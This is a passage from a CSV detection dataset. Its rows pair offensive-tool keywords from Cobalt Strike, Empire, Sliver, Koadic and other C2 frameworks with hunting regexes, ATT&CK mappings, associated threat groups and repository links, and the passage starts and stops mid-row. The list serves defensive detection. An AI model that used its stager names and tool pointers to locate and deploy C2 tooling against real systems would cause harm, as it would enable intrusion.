
Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","60214" "*stage_transform_x64_prepend*",".{0,1000}stage_transform_x64_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - 
Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","60215" "*stage_transform_x64_strrep1*",".{0,1000}stage_transform_x64_strrep1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE 
STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","60216" "*stage_transform_x86_prepend*",".{0,1000}stage_transform_x86_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","60217" 
"*stage_transform_x86_strrep1*",".{0,1000}stage_transform_x86_strrep1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","60218" "*stage1-remotepipelist.py*",".{0,1000}stage1\-remotepipelist\.py.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - 
TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","60219" "*Stage-gSharedInfoBitmap*",".{0,1000}Stage\-gSharedInfoBitmap.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-MS16135.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60220" "*stageless payload*",".{0,1000}stageless\spayload.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","60221" "*Stageless payloads require the --rawscfile 
argument*",".{0,1000}Stageless\spayloads\srequire\sthe\s\-\-rawscfile\sargument.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","60222" "*StageListenerCmd*",".{0,1000}StageListenerCmd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","60223" "*stager/happy_x64.txt*",".{0,1000}stager\/happy_x64\.txt.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","60224" "*stager/happy_x86.txt*",".{0,1000}stager\/happy_x86\.txt.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","60225" "*stager/js/bitsadmin 
*",".{0,1000}stager\/js\/bitsadmin\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60226" "*stager/js/disk*",".{0,1000}stager\/js\/disk.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60227" "*stager/js/mshta*",".{0,1000}stager\/js\/mshta.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60228" "*stager/js/regsvr *",".{0,1000}stager\/js\/regsvr\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60229" "*stager/js/rundll32_js *",".{0,1000}stager\/js\/rundll32_js\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60230" "*stager/js/wmic *",".{0,1000}stager\/js\/wmic\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60231" "*stager/sad_x64.txt*",".{0,1000}stager\/sad_x64\.txt.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","60232" "*stager/sad_x86.txt*",".{0,1000}stager\/sad_x86\.txt.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","60233" "*stager_bind_pipe*",".{0,1000}stager_bind_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 
- T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","60234" "*stager_bind_pipe*",".{0,1000}stager_bind_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","60235" "*stager_bind_tcp*",".{0,1000}stager_bind_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","60236" "*stager_bind_tcp*",".{0,1000}stager_bind_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens 
